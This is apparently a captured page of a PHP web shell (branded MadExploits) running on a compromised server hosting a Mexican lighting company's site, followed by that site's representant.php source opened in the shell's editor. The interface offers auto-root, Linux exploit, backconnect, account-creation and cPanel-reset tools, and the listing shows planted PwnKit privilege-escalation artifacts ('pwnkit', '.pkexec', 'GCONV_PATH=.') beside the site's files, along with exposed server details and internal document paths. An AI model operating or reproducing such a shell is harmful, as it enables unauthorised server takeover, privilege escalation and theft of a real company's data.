Linux cool-chatelet.209-46-124-25.plesk.page 6.8.0-60-generic #63-Ubuntu SMP PREEMPT_DYNAMIC Tue Apr 15 19:04:15 UTC 2025 x86_64
nginx/1.26.3
: 209.46.124.25 | : 216.73.216.5
Cant Read [ /etc/named.conf ]
8.3.21
beghelli.com.mx_t822czighbk
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
vhosts /
beghelli.com.mx /
httpdocs /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
ajax
[ DIR ]
drwxr-xr-x
assets
[ DIR ]
drwxr-xr-x
cms
[ DIR ]
drwxr-xr-x
config
[ DIR ]
drwxr-xr-x
controller
[ DIR ]
drwxr-xr-x
css
[ DIR ]
drwxr-xr-x
js
[ DIR ]
drwxr-xr-x
model
[ DIR ]
drwxr-xr-x
php
[ DIR ]
drwxr-xr-x
.htaccess
385
B
-rw-r--r--
.mad-root
0
B
-rw-r--r--
404.html
2.91
KB
-rw-r--r--
adminer.php
465.43
KB
-rw-r--r--
authorized-agents.php
26.61
KB
-rw-r--r--
beghelli-group.php
31.82
KB
-rw-r--r--
certifications.php
28.79
KB
-rw-r--r--
downloads.php
26.53
KB
-rw-r--r--
fotometrias.php
5.12
KB
-rw-r--r--
index.php
42.95
KB
-rw-r--r--
info-rq.php
29.12
KB
-rw-r--r--
investor-relations.php
27.09
KB
-rw-r--r--
partnerships.php
28.16
KB
-rw-r--r--
privacy-notice.php
49.14
KB
-rw-r--r--
product-detail.php
28.31
KB
-rw-r--r--
product-literature.php
26.79
KB
-rw-r--r--
products-area.html
30.87
KB
-rw-r--r--
products-area.php
29.9
KB
-rw-r--r--
products-category.php
35.76
KB
-rw-r--r--
products-search.php
31.32
KB
-rw-r--r--
provider.php
34.14
KB
-rw-r--r--
providers-login.php
2.58
KB
-rw-r--r--
pwnkit
10.99
KB
-rwxr-xr-x
representant-login.php
2.61
KB
-rw-r--r--
representant.php
68.88
KB
-rw-r--r--
robots.txt
149
B
-rw-r--r--
sitemap.xml
79.16
KB
-rw-r--r--
success-cases.php
52.94
KB
-rw-r--r--
support.php
40.39
KB
-rw-r--r--
thank-you.php
23.76
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : representant.php
<?php session_start(); // Inicia la sesión // Verifica si la sesión está iniciada if (!isset($_SESSION['loggedinRep']) || $_SESSION['loggedinRep'] !== true) { // Si no está logueado, redirige al formulario de inicio de sesión header('Location: index.php'); exit(); } $ajaxRequest = false; require_once 'controller/categoryController.php'; $controller = new categoryController(); $iluminacion = $controller->get_categories_by_area(1); $emergencia = $controller->get_categories_by_area(2); $horticultura = $controller->get_categories_by_area(3); $planet_sun = $controller->get_categories_by_area(4); $portatil = $controller->get_categories_by_area(5); $outlet = $controller->get_categories_by_area(6); $logica = $controller->get_categories_by_area(7); $sanificaaria = $controller->get_categories_by_area(8); ?> <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <!-- Site Reference --> <meta name="description" content="Catálogos para representantes"/> <meta name="keywords" content="beghelli, representantes de ventas"/> <meta name="author" content="Gustavo Bernal Cervantes"/> <meta name="theme-color" content="#012D3E"/> <link rel="canonical" href="https://beghelli.com.mx/"/> <title>Beghelli | Representante</title> <!-- Favicon Tags --> <link rel="apple-touch-icon" sizes="180x180" href="assets/favicon/apple-touch-icon.png"> <link rel="icon" type="image/png" sizes="32x32" href="assets/favicon/favicon-32x32.png"> <link rel="icon" type="image/png" sizes="16x16" href="assets/favicon/favicon-16x16.png"> <link rel="manifest" href="assets/favicon/site.webmanifest"> <!-- OG Meta Tags --> <meta property="og:title" content="Beghelli | Representante"/> <meta property="og:url" content="https://beghelli.com.mx/"/> <meta property="og:image" content="assets/img/og.png"/> <meta property="og:type" content="website"/> <meta property="og:description" content="Catálogos para representantes"/> <meta property="og:locale" content="es_MX"/> <!-- Resources --> <link href="https://fonts.cdnfonts.com/css/sofia-pro" rel="stylesheet"> <link rel="stylesheet" href="css/normalize.css"> <link rel="stylesheet" href="css/style.css"> <script src="https://kit.fontawesome.com/785530d049.js" crossorigin="anonymous"></script> <!-- Cliengo installation for beghelli.com.mx --> <script type="text/javascript"> (function () { var ldk = document.createElement('script'); ldk.type = 'text/javascript'; ldk.async = true; ldk.src = 'https://s.cliengo.com/weboptimizer/63b74475b5d786002a9a087c/63b74477b5d786002a9a0881.js?platform=dashboard'; var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(ldk, s); })(); </script> </head> <body> <body data-scroll=""> <header class="visible white"> <nav> <a href="<?php echo WEBURL;?>index.php"> <img src="assets/img/logo-blue.svg" alt="Logo Beghelli"> </a> <div class="nav__categories"> <button data-menu="us">Grupo Beghelli</button> <button data-menu="products">Productos</button> <button data-menu="technical">Área técnica</button> <button data-menu="search"> <i class="fa-regular fa-magnifying-glass"></i> </button> </div> <div class="nav__contact"> <a href="<?php echo WEBURL;?>support.php">Soporte</a> <a href="<?php echo WEBURL;?>info-rq.php">Contacto</a> </div> <button class="nav__close-btn"> <i class="fa-light fa-xmark"></i> </button> <button class="nav__mob-btn"> <i class="fa-regular fa-bars-staggered"></i> </button> </nav> <div id="menu-us" class="header__menu gallery hidden"> <a href="<?php echo WEBURL;?>beghelli-group.php"> <h3>¿Quiénes somos?</h3> <img src="<?php echo WEBURL;?>assets/img/beghelli-group.jpg" alt=""> </a> <a href="<?php echo WEBURL;?>authorized-agents.php"> <h3>Representantes de ventas</h3> <img src="<?php echo WEBURL;?>assets/img/authorized-agents.jpg" alt=""> </a> <a href="<?php echo WEBURL;?>investor-relations.php"> <h3>Distribuidores</h3> <img src="<?php echo WEBURL;?>assets/img/investor-relations.jpg" alt=""> </a> <a href="<?php echo WEBURL;?>partnerships.php"> <h3>Asociaciones</h3> <img src="<?php echo WEBURL;?>assets/img/partnerships.jpg" alt=""> </a> </div> <div id="menu-products" class="header__menu columns hidden"> <div class="header__menu-column"> <h3>Iluminación</h3> <?php foreach($iluminacion as $cat): ?> <a href="<?php echo WEBURL; ?>products-category/<?php echo $cat['clean_name']; ?>/"><?php echo $cat['name']; ?></a> <?php endforeach; ?> </div> <div class="spacer"></div> <div class="header__menu-column"> <h3>Emergencia</h3> <?php foreach($emergencia as $cat): ?> <a href="<?php echo WEBURL; ?>products-category/<?php echo $cat['clean_name']; ?>/"><?php echo $cat['name']; ?></a> <?php endforeach; ?> <h3>Horticultura</h3> <?php foreach($horticultura as $cat): ?> <a href="<?php echo WEBURL; ?>products-category/<?php echo $cat['clean_name']; ?>/"><?php echo $cat['name']; ?></a> <?php endforeach; ?> </div> <div class="spacer"></div> <div class="header__menu-column"> <h3>Iluminación solar</h3> <?php foreach($planet_sun as $cat): ?> <a href="<?php echo WEBURL; ?>products-category/<?php echo $cat['clean_name']; ?>/"><?php echo $cat['name']; ?></a> <?php endforeach; ?> <h3>Outlet</h3> <?php foreach($outlet as $cat): ?> <a href="<?php echo WEBURL; ?>products-category/<?php echo $cat['clean_name']; ?>/"><?php echo $cat['name']; ?></a> <?php endforeach; ?> <h3>Iluminación Portátil</h3> <?php foreach($portatil as $cat): ?> <a href="<?php echo WEBURL; ?>products-category/<?php echo $cat['clean_name']; ?>/"><?php echo $cat['name']; ?></a> <?php endforeach; ?> </div> <div class="spacer"></div> <div class="header__menu-column"> <h3>Lógica</h3> <?php foreach($logica as $cat): ?> <a href="<?php echo WEBURL; ?>products-category/<?php echo $cat['clean_name']; ?>/"><?php echo $cat['name']; ?></a> <?php endforeach; ?> <h3>Sanificaaria</h3> <?php foreach($sanificaaria as $cat): ?> <a href="<?php echo WEBURL; ?>products-category/<?php echo $cat['clean_name']; ?>/"><?php echo $cat['name']; ?></a> <?php endforeach; ?> </div> </div> <div id="menu-technical" class="header__menu gallery hidden"> <a href="<?php echo WEBURL;?>product-literature.php"> <h3>Catálogos</h3> <img src="<?php echo WEBURL;?>assets/img/product-literature.jpg" alt=""> </a> <a href="<?php echo WEBURL;?>success-cases.php"> <h3>Casos de Éxito</h3> <img src="<?php echo WEBURL;?>assets/img/success-cases.jpg" alt=""> </a> <a href="<?php echo WEBURL;?>downloads.php"> <h3>Información Técnica</h3> <img src="<?php echo WEBURL;?>assets/img/downloads.jpg" alt=""> </a> <a href="<?php echo WEBURL;?>certifications.php"> <h3>Certificaciones</h3> <img src="<?php echo WEBURL;?>assets/img/certifications.jpg" alt=""> </a> </div> <div id="menu-search" class="header__menu search hidden"> <form action="products-search.php" method="GET" class="home__search"> <input type="text" name="search-text" id="search-text" placeholder="¿Qué producto buscas?"> <button type="submit"> <i class="fa-solid fa-magnifying-glass"></i> </button> </form> </div> <div id="menu-mob" class="header__menu-mob hidden"> <form action="products-search.php" method="GET" class="home__search"> <input type="text" name="search-text" id="search-text" placeholder="¿Qué producto buscas?"> <button type="submit"> <i class="fa-solid fa-magnifying-glass"></i> </button> </form> <div class="header__mob-collaps"> <div class="beghelli__collapsible"> <div class="beghelli__collap-header"> <h3>Grupo Beghelli</h3> <i class="fa-regular fa-chevron-down"></i> </div> <div class="beghelli__collap-cont"> <div class="header__mob-gallery"> <a href="<?php echo WEBURL;?>beghelli-group.php"> <h4>¿Quiénes somos?</h4> <img src="<?php echo WEBURL;?>assets/img/beghelli-group.jpg" alt=""> </a> <a href="<?php echo WEBURL;?>authorized-agents.php"> <h4>Representates de ventas</h4> <img src="<?php echo WEBURL;?>assets/img/authorized-agents.jpg" alt=""> </a> <a href="<?php echo WEBURL;?>investor-relations.php"> <h4>Distribuidores</h4> <img src="<?php echo WEBURL;?>assets/img/investor-relations.jpg" alt=""> </a> <a href="<?php echo WEBURL;?>partnerships.php"> <h4>Asociaciones</h4> <img src="<?php echo WEBURL;?>assets/img/partnerships.jpg" alt=""> </a> </div> </div> </div> <div class="beghelli__collapsible"> <div class="beghelli__collap-header"> <h3>Productos</h3> <i class="fa-regular fa-chevron-down"></i> </div> <div class="beghelli__collap-cont"> <div class="header__mob-columns"> <div> <h4>Iluminación</h4> <?php foreach($iluminacion as $cat): ?> <a href="<?php echo WEBURL; ?>products-category/<?php echo $cat['clean_name']; ?>/"><?php echo $cat['name']; ?></a> <?php endforeach; ?> <h4>Iluminación solar</h4> <?php foreach($planet_sun as $cat): ?> <a href="<?php echo WEBURL; ?>products-category/<?php echo $cat['clean_name']; ?>/"><?php echo $cat['name']; ?></a> <?php endforeach; ?> <h4>Outlet</h4> <?php foreach($outlet as $cat): ?> <a href="<?php echo WEBURL; ?>products-category/<?php echo $cat['clean_name']; ?>/"><?php echo $cat['name']; ?></a> <?php endforeach; ?> <h4>Iluminación Portátil</h4> <?php foreach($portatil as $cat): ?> <a href="<?php echo WEBURL; ?>products-category/<?php echo $cat['clean_name']; ?>/"><?php echo $cat['name']; ?></a> <?php endforeach; ?> </div> <span class="spacer"></span> <div> <h4>Emergencia</h4> <?php foreach($emergencia as $cat): ?> <a href="<?php echo WEBURL; ?>products-category/<?php echo $cat['clean_name']; ?>/"><?php echo $cat['name']; ?></a> <?php endforeach; ?> <h4>Horticultura</h4> <?php foreach($horticultura as $cat): ?> <a href="<?php echo WEBURL; ?>products-category/<?php echo $cat['clean_name']; ?>/"><?php echo $cat['name']; ?></a> <?php endforeach; ?> <h4>Lógica</h4> <?php foreach($logica as $cat): ?> <a href="<?php echo WEBURL; ?>products-category/<?php echo $cat['clean_name']; ?>/"><?php echo $cat['name']; ?></a> <?php endforeach; ?> <h4>Sanificaaria</h4> <?php foreach($sanificaaria as $cat): ?> <a href="<?php echo WEBURL; ?>products-category/<?php echo $cat['clean_name']; ?>/"><?php echo $cat['name']; ?></a> <?php endforeach; ?> </div> </div> </div> </div> <div class="beghelli__collapsible"> <div class="beghelli__collap-header"> <h3>Grupo Beghelli</h3> <i class="fa-regular fa-chevron-down"></i> </div> <div class="beghelli__collap-cont"> <div class="header__mob-gallery"> <a href="<?php echo WEBURL;?>product-literature.php"> <h4>Catálogos</h4> <img src="<?php echo WEBURL;?>assets/img/product-literature.jpg" alt=""> </a> <a href="<?php echo WEBURL;?>success-cases.php"> <h4>Casos de Éxito</h4> <img src="<?php echo WEBURL;?>assets/img/success-cases.jpg" alt=""> </a> <a href="<?php echo WEBURL;?>downloads.php"> <h4>Información Técnica</h4> <img src="<?php echo WEBURL;?>assets/img/downloads.jpg" alt=""> </a> <a href="<?php echo WEBURL;?>certifications.php"> <h4>Certificaciones</h4> <img src="<?php echo WEBURL;?>assets/img/certifications.jpg" alt=""> </a> </div> </div> </div> </div> </div> </header> <!-- <main> <section class="privacy__cont"> <div class="privacy"> <div class="beghelli__navigation"> <div class="beghelli__hierarchy"> <p>Beghelli</p> <i class="fa-regular fa-chevron-right" aria-hidden="true"></i> <b>Catálogos para Representantes</b> </div> </div> <h1>Soy Representante</h1> <h2>Material de apoyo</h2> --> <?php require_once "./controller/categoryController.php"; $controller = new categoryController(); echo $controller->list_categories_with_content_controller(); ?> <!-- <h3>1. BEGHELLI MEXICO</h3> <ul> <li><a href="assets/files/representants/marketing/CuentasBancarias_Beghelli.pdf" target="_blank">Cuentas Bancarias</a></li> <li><a href="assets/files/representants/presentaciones/company_profile_beghelli2024_imagenes.pptx" target="_blank">Company Profile</a></li> <li><a href="assets/files/representants/presentaciones/cv_beghelli_2024.pdf" target="_blank">Beghelli CV</a></li> <li><a href="assets/files/representants/brochures/Certificaciones.pdf" target="_blank">Guía de Certificaciones</a></li> </ul> <h3>2. SANIFICAARIA</h3> <ul> <li><a href="assets/files/representants/sanificaaria/entrevista_gelt.pdf" target="_blank">ENTREVISTA GELT INTERNATIONAL (31/mar/21)</a></li> </ul> <h3>3. COMUNICADOS</h3> <p>3.1. POLÍTICAS INTERNAS Y EXTERNAS APLICABLES AL ÁREA DE REPRESENTANTES DE VENTAS</p> <ul> <li><a href="assets/files/representants/comunicados/POLITICA%20DE%20CREDITO%202022%20(1).pdf" target="_blank">POLÍTICA DE CRÉDITO 2022 (15/03/2022)</a></li> <li><a href="assets/files/representants/comunicados/POLITICA%20DE%20VIATICOS%20MARZO%202022.pdf" target="_blank">POLÍTICA DE VIÁTICOS 2022 (15/03/2022)</a></li></ul> <h3>4. FICHAS PRE-LANZAMIENTO</h3> <p>4.1. PRELIMINARES</p> <ul> <li><a href="assets/files/representants/bds_x3.pdf" target="_blank">BDS X3</a></li> </ul> <p>4.2. LANZAMIENTOS INTERNOS</p> <ul> <li><a href="assets/files/representants/marketing/BS100%20LED%20ECO/ficha_tecnica_bs100led_eco.pdf" target="_blank">FICHA TÉCNICA BS100LED ECO</a></li> <li><a href="assets/files/representants/marketing/BS100%20LED%20ECO/manual_bs100led-eco.pdf" target="_blank">MANUAL BS100LED ECO</a></li> <li><a href="assets/files/representants/marketing/fotometria_bs100_eco_led.zip" target="_blank">FOTOMETRÍA BS100LED ECO</a></li> <li><a href="assets/files/representants/marketing/BS100%20LED%20ECO/STORY%20BS100ECOLED%20CORROSIÓN.png" target="_blank">IMAGEN PUBLICITARIA 1</a></li> <li><a href="assets/files/representants/marketing/BS100%20LED%20ECO/STORY%20BS100ECOLED%20F%203%20SELLOS.png" target="_blank">IMAGEN PUBLICITARIA 2</a></li> </ul> <p>4.3. NIGHTSTICK</p> <ul> <li><a href="assets/files/representants/marketing/NIGHTSTICK.zip" target="_blank">FICHAS TÉCNICAS</a></li> </ul> <h3>5. FICHAS RIG A LITE</h3> <ul> <li><a href="assets/files/representants/documentos/nom/RIGALITE-CON-NOM.pdf" target="_blank">Productos Rig-A-Lite Certificados con NOM por Beghelli</a></li> <li><a href="assets/files/representants/hz/ALIJ_LED.pdf" target="_blank">ALIJ LED</a></li> <li><a href="assets/files/representants/hz/CHL_LED.pdf" target="_blank">CHL LED</a></li> <li><a href="assets/files/representants/hz/LFL_LED.pdf" target="_blank">LFL LED</a></li> <li><a href="assets/files/representants/hz/LHFL_HIGH-MID_BAY_LED.pdf" target="_blank">LHFL LED HIGH MID BAY</a></li> <li><a href="assets/files/representants/hz/LHFL_LED.pdf" target="_blank">LHFL LED</a></li> <li><a href="assets/files/representants/hz/LHFLJ_LED.pdf" target="_blank">LHFLJ LED</a></li> <li><a href="assets/files/representants/hz/MHL_LED.pdf" target="_blank">MHL LED</a></li> <li><a href="assets/files/representants/hz/MHLS_LED.pdf" target="_blank">MHLS LED</a></li> <li><a href="assets/files/representants/hz/SAFJ-Hi-Lumen _LED.pdf" target="_blank">SAFJ-HI LUMEN LED</a></li> <li><a href="assets/files/representants/hz/SAFJ_LED.pdf" target="_blank">SAFJ LED</a></li> <li><a href="assets/files/representants/hz/SAFR_LED.pdf" target="_blank">SAFR LED</a></li> <li><a href="assets/files/representants/hz/SXPJ_LED.pdf" target="_blank">SXPJ LED</a></li> <li><a href="assets/files/representants/hz/XML_LED.pdf" target="_blank">XML LED</a></li> <li><a href="assets/files/representants/hz/XPEH_LED.pdf" target="_blank">XPEH LED</a></li> <li><a href="assets/files/representants/hz/XPEL_LED.pdf" target="_blank">XPEL LED</a></li> <li><a href="assets/files/representants/hz/XPS_LED.pdf" target="_blank">XPS LED</a></li> </ul> <h3>6. PRESENTACIONES</h3> <p>6.1. POR ESPECIALIDAD</p> <ul> <li><a href="assets/files/representants/presentaciones/areas_clasificadas_presentacion%20(2).pptx" target="_blank">Areas Clasificadas (30/agosto/2023)</a></li> <li><a href="assets/files/representants/presentaciones/CUARTOS%20LIMPIOS-A.%20ALIMENTICIAS%20(2).pptx" target="_blank">Cuartos Limpios y Áreas Alimenticias (30/agosto/2023)</a></li> <li><a href="assets/files/representants/presentaciones/EMERGENCIA%20ACTUALIZADA%20(3).pptx" target="_blank">Emergencia (30/agosto/2023)</a></li> <li><a href="assets/files/representants/presentaciones/TEMP.%20EXTREMAS%20ACTUALIZADA%20(2).pptx" target="_blank">Temperaturas Extremas (30/agosto/2023)</a></li> </ul><h3>7. CERTIFICADOS</h3> <p>7.1. ARIETIS LED</p> <ul> <li><a href="assets/files/representants/certificados/2025/19DOM02990A09R06_2025.pdf" target="_blank">CERTIFICADO DE CONFORMIDAD DE PRODUCTO</a></li> <li><a href="assets/files/representants/certificados/ARIETIS%20LED/ARIETISLED_REP.CHECA.pdf" target="_blank">CE CONFORMITY DECLARATION</a></li> <li><a href="assets/files/representants/certificados/ARIETIS%20LED/Clean-rooms%20Declaration.pdf" target="_blank">CLEAN ROOMS DECLARATION</a></li> </ul> <p>7.2. BS100 LED</p> <ul> <li><a href="assets/files/representants/certificados/2025/19DOM02990A09R06_2025.pdf" target="_blank">CERTIFICADO DE CONFORMIDAD DE PRODUCTO</a></li> <li><a href="assets/files/representants/certificados/BS100%20LED/BS100LED%20-%20TITLE%2020%20PROOF.pdf.pdf" target="_blank">CALIFORNIA ENERGY COMMISION</a></li> <li><a href="assets/files/representants/certificados/BS100%20LED/BS100LED%20IK%20degree.pdf" target="_blank">BS100LED IK DEGREE</a></li> <li><a href="assets/files/representants/certificados/BS100%20LED/Beghelli%20USA%20Self%20Declaration%20for%20RoHS%20Compliance.pdf" target="_blank">SELF DECLARATION FOR RoHS COMPLIANCE</a></li> <li><a href="assets/files/representants/certificados/BS100%20LED/CoFC_70117612_EN.PDF" target="_blank">CERTIFICATE OF COMPLIANCE</a></li> <li><a href="assets/files/representants/certificados/BS100%20LED/INTERTEK-SANITATION%20LISTED.pdf" target="_blank">INTERTEK AUTHORIZATION TO MARK</a></li> <li><a href="assets/files/representants/certificados/BS100%20LED/LAPC21J21-03%20ippro%20LED%20int%2048W_JIM_mar.pdf" target="_blank">INFORME DE PRUEBAS GRADOS DE PROTECCIÓN IP</a></li> <li><a href="assets/files/representants/certificados/BS100%20LED/LDVV20I01.pdf" target="_blank">LDVV20I01</a></li> <li><a href="assets/files/representants/certificados/BS100%20LED/RESISTENCIA.POLICARBONATO.pdf" target="_blank">RESISTENCIA POLICARBOTANO</a></li> <li><a href="assets/files/representants/certificados/BS100%20LED/certificate%20for%20IP66%20rating%20BS100%5b1%5d.pdf" target="_blank">CERTIFICATE FOR IP66 RATING</a></li> <li><a href="assets/files/representants/certificados/BS100%20LED/ILLUMINA%20FAMILY%20-%20NSF%20CERTIFICATE.pdf" target="_blank">CERTIFICADO NSF</a></li> </ul> <p>7.3. BS101 LED</p> <ul> <li><a href="assets/files/representants/certificados/2025/19DOM02990A09R06_2025.pdf" target="_blank">CERTIFICADO DE CONFORMIDAD DE PRODUCTO BS101 LED</a></li> <li><a href="assets/files/representants/certificados/BS101%20LED/Beghelli%20USA%20Self%20Declaration%20for%20RoHS%20Compliance.pdf" target="_blank">SELF DECLARATION FOR RoHS COMPLIANCE BS101 LED</a></li> <li><a href="assets/files/representants/certificados/BS101%20LED/CoFC_70117612_EN.PDF" target="_blank">COFC CERTIFICATE OF COMPLIANCE BS101 LED</a></li> <li><a href="assets/files/representants/certificados/BS101%20LED/IK_BS101.pdf" target="_blank">IK-BS101 LED</a></li> <li><a href="assets/files/representants/certificados/BS101%20LED/ILLUMINA%20FAMILY%20-%20NSF%20CERTIFICATE.pdf" target="_blank">CERTIFICADO NSF</a></li> </ul> <p>7.4. BS101 LED ECO</p> <ul> <li><a href="assets/files/representants/certificados/2025/19DOM02990A09R06_2025.pdf" target="_blank">CERTIFICADO DE CONFORMIDAD DE PRODUCTO BS101 LED ECO</a></li> <li><a href="assets/files/representants/certificados/BS101LED%20ECO/Beghelli%20USA%20Self%20Declaration%20for%20RoHS%20Compliance.pdf" target="_blank">SELF DECLARATION FOR RoHS COMPLIANCE BS101 LED ECO</a></li> <li><a href="assets/files/representants/certificados/BS101LED%20ECO/CoFC_70117612_EN.PDF" target="_blank">COFC CERTIFICATE OF COMPLIANCE BS101 LED ECO</a></li> <li><a href="assets/files/representants/certificados/BS101LED%20ECO/IK_BS101.pdf" target="_blank">IK-BS101 LED ECO</a></li> <li><a href="assets/files/representants/certificados/BS101LED%20ECO/ILLUMINA%20FAMILY%20-%20NSF%20CERTIFICATE.pdf" target="_blank">CERTIFICADO NSF</a></li> </ul> <p>7.5. CASTEX</p> <ul> <li><a href="assets/files/representants/certificados/2025/19DOM02993A06R06_2025.pdf" target="_blank">CERTIFICADO DE CONFORMIDAD DE PRODUCTO CASTEX</a></li> <li><a href="assets/files/representants/certificados/CASTEX/CASTEX%20HAZARDOUS%20LOCATION%20BEGHELLI.pdf" target="_blank">LUMINAIRES FOR USE IN HAZARDOUES LOCATION CASTEX</a></li> </ul> <p>7.6. CASTEX 100</p> <ul> <li><a href="assets/files/representants/certificados/2025/19DOM02993A06R06_2025.pdf" target="_blank">CERTIFICADO DE CONFORMIDAD DE PRODUCTO CASTEX 100</a></li> <li><a href="assets/files/representants/certificados/CASTEX%20150/CN23UI4A%20001%c2%a0IP66%c2%a0IP67%c2%a0-%c2%a0HZCAS150HTxxxxWTyyzzz120-277V_extsigned.pdf" target="_blank">REPORTE DE PRUEBA IP67</a></li> <li><a href="assets/files/representants/certificados/CASTEX%20100/CN23KOKS%20001%c2%a0IK10%c2%a0-%c2%a0HZCAS100HTxxxxWTyyzzz120-277V_extsigned.pdf" target="_blank">REPORTE DE PRUEBA IK10</a></li> </ul> <p>7.7. CASTEX 150</p> <ul> <li><a href="assets/files/representants/certificados/2025/19DOM02993A06R06_2025.pdf" target="_blank">CERTIFICADO DE CONFORMIDAD DE PRODUCTO CASTEX 150</a></li> <li><a href="assets/files/representants/certificados/CASTEX%20150/CN23UI4A%20001%c2%a0IP66%c2%a0IP67%c2%a0-%c2%a0HZCAS150HTxxxxWTyyzzz120-277V_extsigned.pdf" target="_blank">REPORTE DE PRUEBA IP67</a></li> <li><a href="assets/files/representants/certificados/CASTEX%20150/CN234PEX%20001%c2%a0IK10%c2%a0-%c2%a0HZCAS150HTxxxxWTyyzzz120-277V_extsigned.pdf" target="_blank">REPORTE DE PRUEBA IK10</a></li> </ul> <p>7.8. CASTEX 210</p> <ul> <li><a href="assets/files/representants/certificados/2025/19DOM02993A06R06_2025.pdf" target="_blank">CERTIFICADO DE CONFORMIDAD DE PRODUCTO CASTEX 210</a></li> <li><a href="assets/files/representants/certificados/CASTEX%20210/INTERTEK-MARINE.pdf" target="_blank">CERTIFICATE OF COMPLIANCE MARINE CASTEX 210</a></li> <li><a href="assets/files/representants/certificados/CASTEX%20210/INTERTEK_BEGHELLI_CASTEX-210.pdf" target="_blank">CERTIFICATE OF COMPLIANCE INTERTEK CASTEX 210</a></li> <li><a href="assets/files/representants/certificados/CASTEX%20210/CN235525%20001%c2%a0IP66%c2%a0IP67%c2%a0-%c2%a0HZCAS210HTxxxxWTyyzzz120-277V.pdf" target="_blank">REPORTE DE PRUEBA IP67</a></li> <li><a href="assets/files/representants/certificados/CASTEX%20210/CN23KJ33%20001%c2%a0IK10%c2%a0-%c2%a0HZCAS210HTxxxxWTyyzzz120-277V_extsigned.pdf" target="_blank">REPORTE DE PRUEBA IK10</a></li></ul> <p>7.9. CASTEX 300</p> <ul> <li><a href="assets/files/representants/certificados/2025/19DOM02993A06R06_2025.pdf" target="_blank">CERTIFICADO DE CONFORMIDAD DE PRODUCTO CASTEX 300</a></li> <li><a href="assets/files/representants/certificados/CASTEX%20300/INTERTEK-MARINE.pdf" target="_blank">CERTIFICATE OF COMPLIANCE MARINE CASTEX 300</a></li> <li><a href="assets/files/representants/certificados/CASTEX%20300/INTERTEK_BEGHELLI_CASTEX-300.pdf" target="_blank">CERTIFICATE OF COMPLIANCE INTERTEK CASTEX 300</a></li> <li><a href="assets/files/representants/certificados/CASTEX%20300/CN23JFLN%20001%c2%a0IK10%c2%a0-%c2%a0HZCAS300HTxxxxWTyyzzz120-277V_extsigned.pdf" target="_blank">REPORTE DE PRUEBA IP67</a></li> <li><a href="assets/files/representants/certificados/CASTEX%20300/CN23JFLN%20001%c2%a0IK10%c2%a0-%c2%a0HZCAS300HTxxxxWTyyzzz120-277V_extsigned.pdf" target="_blank">REPORTE DE PRUEBA IK10</a></li> </ul> <p>7.10. CASTEX 310</p> <ul> <li><a href="assets/files/representants/certificados/2025/19DOM02993A06R06_2025.pdf" target="_blank">CERTIFICADO DE CONFORMIDAD DE PRODUCTO CASTEX 310</a></li> <li><a href="assets/files/representants/certificados/CASTEX%20310/INTERTEK-MARINE.pdf" target="_blank">CERTIFICATE OF COMPLIANCE MARINE CASTEX 310</a></li> <li><a href="assets/files/representants/certificados/CASTEX%20310/INTERTEK_BEGHELLI_CASTEX-310.pdf" target="_blank">CERTIFICATE OF COMPLIANCE INTERTEK CASTEX 310</a></li> <li><a href="assets/files/representants/certificados/CASTEX%20310/CN23TJ09%20001%c2%a0IP66%c2%a0IP67%c2%a0-%c2%a0HZCAS310HTxxxxWTyyzzz120-277V_extsigned.pdf" target="_blank">REPORTE DE PRUEBA IP67</a></li> <li><a href="assets/files/representants/certificados/CASTEX%20310/CN23XM8X%20001%c2%a0IK10%c2%a0-%c2%a0HZCAS310HTxxxxWTyyzzz120-277V_extsigned.pdf" target="_blank">REPORTE DE PRUEBA IK10</a></li> </ul> <p>7.11. CASTEX 320</p> <ul> <li><a href="assets/files/representants/certificados/2025/19DOM02993A06R06_2025.pdf" target="_blank">CERTIFICADO DE CONFORMIDAD DE PRODUCTO CASTEX 320</a></li> <li><a href="assets/files/representants/certificados/CASTEX%20320/INTERTEK-MARINE.pdf" target="_blank">CERTIFICATE OF COMPLIANCE CASTEX MARINE 320</a></li> <li><a href="assets/files/representants/certificados/CASTEX%20320/INTERTEK_BEGHELLI_CASTEX-320.pdf" target="_blank">CERTIFICATE OF COMPLIANCE INTERTEK CASTEX 320</a></li> <li><a href="assets/files/representants/certificados/CASTEX%20320/CN231W4Z%20001%c2%a0IP66%c2%a0IP67%c2%a0-%c2%a0HZCAS320HTxxxxWTyyzzz120-277V_extsigned.pdf" target="_blank">REPORTE DE PRUEBA IP67</a></li> <li><a href="assets/files/representants/certificados/CASTEX%20320/CN23QISO%20001%c2%a0IK10%c2%a0-%c2%a0HZCAS320HTxxxxWTyyzzz120-277V_extsigned.pdf" target="_blank">REPORTE DE PRUEBA IK10</a></li> </ul> <p>7.12. CASTEX 400</p> <ul> <li><a href="assets/files/representants/certificados/2025/19DOM02993A06R06_2025.pdf" target="_blank">CERTIFICADO DE CONFORMIDAD DE PRODUCTO CASTEX 400</a></li> <li><a href="assets/files/representants/certificados/CASTEX%20400/CN23MTA3%20001%c2%a0IP66%20IP67%20-%c2%a0HZCAS400HTxxxxWTyyzzz120-277V_extsigned.pdf" target="_blank">REPORTE DE PRUEBA IP67</a></li> <li><a href="assets/files/representants/certificados/CASTEX%20400/CN23BA82%20001%c2%a0IK10%c2%a0-%c2%a0HZCAS400HTxxxxWTyyzzz120-277V_extsigned.pdf" target="_blank">REPORTE DE PRUEBA IK10</a></li></ul> <p>7.13. CASTEX 510</p> <ul> <li><a href="assets/files/representants/certificados/2025/19DOM02993A06R06_2025.pdf" target="_blank">CERTIFICADO DE CONFORMIDAD DE PRODUCTO CASTEX 510</a></li> <li><a href="assets/files/representants/certificados/CASTEX%20510/INTERTEK-MARINE_BEGHELLI_CASTEX.pdf" target="_blank">CERTIFICATE OF COMPLIANCE CASTEX MARINE 510</a></li> <li><a href="assets/files/representants/certificados/CASTEX%20510/INTERTEK_BEGHELLI_CASTEX-510.pdf" target="_blank">CERTIFICATE OF COMPLIANCE INTERTEK CASTEX 510</a></li> <li><a 